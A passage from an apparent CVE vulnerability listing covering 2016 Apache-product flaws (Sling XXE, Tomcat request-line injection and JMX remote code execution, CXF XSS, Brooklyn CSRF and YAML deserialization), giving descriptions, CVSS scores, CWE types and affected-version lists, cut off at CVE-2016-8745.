apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6798 HIGH

In the XSS Protection API module before 1.0.12 in Apache Sling, the method XSS.getValidXML() uses an insecure SAX parser to validate the input string, which allows for XXE attacks in all scripts which use this method to validate user input, potentially allowing an attacker to read sensitive data on the filesystem, perform same-site-request-forgery (SSRF), port-scanning behind the firewall or DoS the application.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache sling *
CVE-2016-6799 MEDIUM

Product: Apache Cordova Android 5.2.2 and earlier. The application calls methods of the Log class. Messages passed to these methods (Log.v(), Log.d(), Log.i(), Log.w(), and Log.e()) are stored in a series of circular buffers on the device. By default, a maximum of four 16 KB rotated logs are kept in addition to the current log. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache cordova *
CVE-2016-6800 MEDIUM

The default configuration of the Apache OFBiz framework offers a blog functionality. Different users are able to operate blogs which are related to specific parties. In the form field for the creation of new blog articles the user input of the summary field as well as the article field is not properly sanitized. It is possible to inject arbitrary JavaScript code in these form fields. This code gets executed from the browser of every user who is visiting this article. Mitigation: Upgrade to Apache OFBiz 16.11.01.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 13.07
apache ofbiz 13.07.02
apache ofbiz 11.04.05
apache ofbiz 11.04.01
apache ofbiz 11.04.06
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 12.04
apache ofbiz 11.04.03
apache ofbiz 13.07.03
apache ofbiz 11.04
apache ofbiz 12.04.04
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.06
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 13.07.01
CVE-2016-6801 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache jackrabbit 2.4.0
apache jackrabbit 2.6.5
apache jackrabbit 2.6.1
apache jackrabbit 2.10.1
apache jackrabbit 2.12.2
apache jackrabbit 2.12.1
apache jackrabbit 2.12.3
apache jackrabbit 2.13.0
apache jackrabbit 2.4.4
apache jackrabbit 2.10.3
apache jackrabbit 2.12.0
apache jackrabbit 2.6.3
apache jackrabbit 2.4.2
apache jackrabbit 2.8.1
apache jackrabbit 2.10.2
apache jackrabbit 2.10.0
apache jackrabbit 2.13.2
apache jackrabbit 2.6.0
apache jackrabbit 2.4.3
apache jackrabbit 2.6.2
debian debian_linux 8.0
apache jackrabbit 2.8.0
apache jackrabbit 2.8.2
apache jackrabbit 2.4.1
apache jackrabbit 2.6.4
apache jackrabbit 2.4.5
apache jackrabbit 2.13.1
CVE-2016-6802 MEDIUM

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache shiro 1.3.1
CVE-2016-6803 HIGH

An installer defect known as an "unquoted Windows search path vulnerability" affected the Apache OpenOffice before 4.1.3 installers for Windows. The PC must have previously been infected by a Trojan Horse application (or user) running with administrative privilege. Any installer with the unquoted search path vulnerability becomes a delayed trigger for the exploit.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-426,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-6804 HIGH

The Apache OpenOffice installer (versions prior to 4.1.3, including some branded as OpenOffice.org) for Windows contains a defective operation that allows execution of arbitrary code with elevated privileges. This requires that the location in which the installer is run has been previously poisoned by a file that impersonates a dynamic-link library that the installer depends upon.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2016-6805 MEDIUM

Apache Ignite before 1.9 allows man-in-the-middle attackers to read arbitrary files via XXE in modified update-notifier documents.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache ignite *
CVE-2016-6806 MEDIUM

Apache Wicket 6.x before 6.25.0, 7.x before 7.5.0, and 8.0.0-M1 provide a CSRF prevention measure that fails to discover some cross origin requests. The mitigation is to not only check the Origin HTTP header, but also take the Referer HTTP header into account when no Origin was provided. Furthermore, not all Wicket server side targets were subjected to the CSRF check. This was also fixed.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache wicket 7.0.0
apache wicket 6.24.0
apache wicket 7.4.0
apache wicket 6.23.0
apache wicket 8.0.0
apache wicket 7.1.0
apache wicket 7.2.0
apache wicket 7.3.0
apache wicket 6.21.0
apache wicket 6.22.0
apache wicket 6.20.0
CVE-2016-6807 HIGH

Custom commands may be executed on Ambari Agent (2.4.x, before 2.4.2) hosts without authorization, leading to unauthorized access to operations that may affect the underlying system. Such operations are invoked by the Ambari Agent process on Ambari Agent hosts, as the user executing the Ambari Agent process.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
CVE-2016-6808 HIGH

Buffer overflow in Apache Tomcat Connectors (mod_jk) before 1.2.42.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache tomcat_jk_connector *
CVE-2016-6809 HIGH

Apache Tika before 1.14 allows Java code execution for serialized objects embedded in MATLAB files. The issue exists because Tika invokes JMatIO to do native deserialization.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache nutch 2.3.1
apache tika *
CVE-2016-6810 MEDIUM

In Apache ActiveMQ 5.x before 5.14.2, an instance of a cross-site scripting vulnerability was identified to be present in the web based administration console. The root cause of this issue is improper user data output validation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq *
CVE-2016-6811 HIGH

In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop *
CVE-2016-6812 MEDIUM

The HTTP transport module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 uses FormattedServiceListWriter to provide an HTML page which lists the names and absolute URL addresses of the available service endpoints. The module calculates the base URL using the current HttpServletRequest. The calculated base URL is used by FormattedServiceListWriter to build the service endpoint absolute URLs. If the unexpected matrix parameters have been injected into the request URL then these matrix parameters will find their way back to the client in the services list page which represents an XSS risk to the client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2016-6813 HIGH

Apache CloudStack 4.1 to 4.8.1.0 and 4.9.0.0 contain an API call designed to allow a user to register for the developer API. If a malicious user is able to determine the ID of another (non-"root") CloudStack user, the malicious user may be able to reset the API keys for the other user, in turn accessing their account and resources.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.9.0
CVE-2016-6814 HIGH

When an application with unsupported Codehaus versions of Groovy from 1.7.0 to 2.4.3, Apache Groovy 2.4.4 to 2.4.7 on classpath uses standard Java serialization mechanisms, e.g. to communicate between servers or to store local data, it was possible for an attacker to bake a special serialized object that will execute code directly when deserialized. All applications which rely on serialization and do not isolate the code which deserializes objects were subject to this vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache groovy *
redhat enterprise_linux_server 7.0
CVE-2016-6815 MEDIUM

In Apache Ranger before 0.6.2, users with "keyadmin" role should not be allowed to change password for users with "admin" role.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.3
apache ranger 0.6.1
apache ranger 0.4.0
apache ranger 0.5.2
apache ranger 0.6.0
apache ranger 0.5.0
CVE-2016-6816 MEDIUM

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 8.5.2
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 6.0.24
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.46
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.38
apache tomcat 8.0.37
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 6.0.44
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 6.0.22
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 6.0.25
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 6.0.6
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 6.0.9
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
apache tomcat 6.0.35
CVE-2016-6817 MEDIUM

The HTTP/2 header parser in Apache Tomcat 9.0.0.M1 to 9.0.0.M11 and 8.5.0 to 8.5.6 entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,CWE-835,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.4
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 9.0.0
apache tomcat 8.5.5
apache tomcat 8.5.0
apache tomcat 8.5.3
CVE-2016-8612 LOW

Apache HTTP Server mod_cluster before version httpd 2.4.23 is vulnerable to an Improper Input Validation in the protocol parsing logic in the load balancer resulting in a Segmentation Fault in the serving httpd process.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_linux 6.0
apache http_server *
redhat enterprise_linux 7.0
netapp storage_automation_store -
CVE-2016-8734 MEDIUM

Apache Subversion's mod_dontdothat module and HTTP clients 1.4.0 through 1.8.16, and 1.9.0 through 1.9.4 are vulnerable to a denial-of-service attack caused by exponential XML entity expansion. The attack can cause the targeted process to consume an excessive amount of CPU resources or memory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache subversion 1.8.12
apache subversion 1.9.1
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.8.13
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.9.0
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
debian debian_linux 9.0
apache subversion 1.8.6
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
debian debian_linux 8.0
apache subversion 1.6.13
apache subversion 1.7.20
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.9.4
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.8.15
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.9.3
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.14
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
apache subversion 1.8.16
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.9.2
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2016-8735 HIGH

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle micros_relate_crm_software 11.4
apache tomcat 8.0.20
oracle agile_engineering_data_management 6.2.1.0
oracle micros_retail_xbri_loss_prevention 10.7.7
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.11
redhat jboss_enterprise_web_server 3.0.0
apache tomcat 6.0.37
apache tomcat 8.5.2
oracle transportation_management 6.3.3
apache tomcat 7.0.62
apache tomcat 6.0.2
canonical ubuntu_linux 16.04
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 6.0.28
apache tomcat 8.5.4
apache tomcat 6.0.33
oracle transportation_management 6.3.0
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 6.0.13
apache tomcat *
apache tomcat 7.0.43
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
netapp oncommand_insight -
oracle communications_application_session_controller 3.7.1
apache tomcat 6.0.26
apache tomcat 6.0.34
apache tomcat 7.0.24
apache tomcat 6.0.20
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.6
oracle agile_engineering_data_management 6.1.3
apache tomcat 7.0.8
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 6.0.41
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 6.0.46
oracle agile_plm 9.3.6
apache tomcat 6.0.27
apache tomcat 6.0.38
apache tomcat 7.0.41
oracle transportation_management 6.3.5
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
debian debian_linux 8.0
oracle micros_relate_crm_software 10.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.48
oracle hospitality_guest_access 4.2.1
oracle communications_interactive_session_recorder 6.0
apache tomcat 6.0.25
apache tomcat 7.0.42
apache tomcat 7.0.61
apache tomcat 7.0.29
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 7.0.14
apache tomcat 8.0.24
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 7.0.52
apache tomcat 6.0.9
oracle micros_retail_xbri_loss_prevention 10.0.1
apache tomcat 6.0.35
oracle micros_retail_xbri_loss_prevention 10.8.0
apache tomcat 8.5.5
apache tomcat 8.0.22
oracle agile_engineering_data_management 6.2.0
apache tomcat 6.0.43
apache tomcat 8.0.3
oracle hospitality_guest_access 4.2.0
apache tomcat 6.0.29
apache tomcat 8.0.35
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
oracle communications_interactive_session_recorder 6.1
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 7.0.38
apache tomcat 7.0.9
apache tomcat 6.0.42
apache tomcat 7.0.18
apache tomcat 7.0.7
netapp 7-mode_transition_tool -
oracle communications_interactive_session_recorder 6.2
oracle transportation_management 6.3.6
apache tomcat 6.0.18
apache tomcat 7.0.34
oracle micros_retail_xbri_loss_prevention 10.5.0
apache tomcat 6.0.31
apache tomcat 6.0.30
apache tomcat 7.0.45
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.27
oracle transportation_management 6.3.7
oracle retail_convenience_and_fuel_pos_software 2.1.132
apache tomcat 7.0.69
apache tomcat 8.0.13
apache tomcat 8.0.31
oracle communications_instant_messaging_server 10.0.1
apache tomcat 6.0.24
apache tomcat 6.0.14
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
oracle transportation_management 6.3.1
apache tomcat 6.0.8
oracle transportation_management 6.3.4
apache tomcat 7.0.50
oracle micros_retail_xbri_loss_prevention 10.8.1
apache tomcat 6.0.12
netapp snap_creator_framework -
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 8.0.23
apache tomcat 6.0.44
oracle micros_retail_xbri_loss_prevention 10.6.0
apache tomcat 6.0.22
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.23
oracle communications_application_session_controller 3.8.0
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 6.0.17
apache tomcat 8.0.34
apache tomcat 6.0.45
apache tomcat 8.0.21
apache tomcat 7.0.37
apache tomcat 7.0.54
apache tomcat 6.0.47
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
oracle agile_plm 9.3.5
oracle mysql_enterprise_monitor *
apache tomcat 8.0.9
apache tomcat 6.0.6
apache tomcat 6.0.10
apache tomcat 7.0.49
apache tomcat 8.0.1
netapp oncommand_shift -
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.0
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.2
oracle transportation_management 6.3.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2016-8736 HIGH

Apache OpenMeetings before 3.1.2 is vulnerable to Remote Code Execution via RMI deserialization attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2016-8737 MEDIUM

In Apache Brooklyn before 0.10.0, the REST server is vulnerable to cross-site request forgery (CSRF), which could permit a malicious web site to produce a link which, if clicked whilst a user is logged in to Brooklyn, would cause the server to execute the attacker's commands as the user. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2016-8738 MEDIUM

In Apache Struts 2.5 through 2.5.5, if an application allows entering a URL in a form field and the built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.5.5
apache struts 2.5.2
apache struts 2.5.1
CVE-2016-8739 HIGH

The JAX-RS module in Apache CXF prior to 3.0.12 and 3.1.x prior to 3.1.9 provides a number of Atom JAX-RS MessageBodyReaders. These readers use Apache Abdera Parser which expands XML entities by default which represents a major XXE risk.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache cxf 3.1.3
apache cxf 3.1.0
apache cxf *
apache cxf 3.1.4
apache cxf 3.1.8
apache cxf 3.1.5
apache cxf 3.1.6
apache cxf 3.1.2
apache cxf 3.1.1
apache cxf 3.1.7
CVE-2016-8740 MEDIUM

The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.17
apache http_server 2.4.19
apache http_server 2.4.21
apache http_server 2.4.23
apache http_server 2.4.20
apache http_server 2.4.18
apache http_server 2.4.22
CVE-2016-8741 MEDIUM

The Apache Qpid Broker for Java can be configured to use different so called AuthenticationProviders to handle user authentication. Among the choices are the SCRAM-SHA-1 and SCRAM-SHA-256 AuthenticationProvider types. It was discovered that these AuthenticationProviders in Apache Qpid Broker for Java 6.0.x before 6.0.6 and 6.1.x before 6.1.1 prematurely terminate the SCRAM SASL negotiation if the provided user name does not exist thus allowing remote attacker to determine the existence of user accounts. The Vulnerability does not apply to AuthenticationProviders other than SCRAM-SHA-1 and SCRAM-SHA-256.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache qpid_broker-j 6.0.3
apache qpid_broker-j 6.0.4
apache qpid_broker-j 6.0.2
apache qpid_broker-j 6.0.5
apache qpid_broker-j 6.1.0
apache qpid_broker-j 6.0.1
CVE-2016-8742 HIGH

The Windows installer that the Apache CouchDB team provides was vulnerable to local privilege escalation. All files in the install inherit the file permissions of the parent directory and therefore a non-privileged user can substitute any executable for the nssm.exe service launcher, or CouchDB batch or binary files. A subsequent service or server restart will then run that binary with administrator privilege. This issue affected CouchDB 2.0.0 (Windows platform only) and was addressed in CouchDB 2.0.0.1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache couchdb 2.0.0
CVE-2016-8743 MEDIUM

Apache HTTP Server, in all releases prior to 2.2.32 and 2.4.25, was liberal in the whitespace accepted from requests and sent in response lines and headers. Accepting these different behaviors represented a security concern when httpd participates in any chain of proxies or interacts with back-end application servers, either through mod_proxy or using conventional CGI mechanisms, and may result in request smuggling, response splitting and cache pollution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat jboss_core_services 1.0
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server 6.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 7.0
CVE-2016-8744 HIGH

Apache Brooklyn uses the SnakeYAML library for parsing YAML inputs. SnakeYAML allows the use of YAML tags to indicate that SnakeYAML should unmarshal data to a Java type. In the default configuration in Brooklyn before 0.10.0, SnakeYAML will allow unmarshalling to any Java type available on the classpath. This could provide an authenticated user with a means to cause the JVM running Brooklyn to load and run Java code without detection by Brooklyn. Such code would have the privileges of the Java process running Brooklyn, including the ability to open files and network connections, and execute system commands. There is known to be a proof-of-concept exploit using this vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache brooklyn *
CVE-2016-8745 MEDIUM

